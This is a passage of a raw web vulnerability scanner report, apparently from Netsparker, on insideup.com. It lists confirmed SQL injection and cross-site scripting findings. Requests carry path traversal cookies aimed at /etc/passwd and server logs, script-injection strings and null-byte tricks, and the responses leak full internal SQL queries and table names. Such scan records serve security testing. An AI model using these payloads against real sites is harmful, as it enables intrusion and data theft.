OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=iig1fa2acsee32i6es3qld6p76; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join 
sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005A5)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/meac00/

/ppc/leadflow/meac00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0005A9)</script>

Request

GET /ppc/leadflow/meac00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005A9)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mfaikltnl0op07gdb4fjgjlp95; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>' OR prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>' OR prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>' OR prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>' OR prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>' OR prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005A9)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lgds00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005A7)%3C/script%3E

/ppc/leadflow/lgds00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005A7)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 80005
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0005A7)</script>

Request

GET /ppc/leadflow/lgds00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005A7)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=lslmvgsvm52p867vqa768nu416; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005A7)</script>/' union select prj.catI' at line 5
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
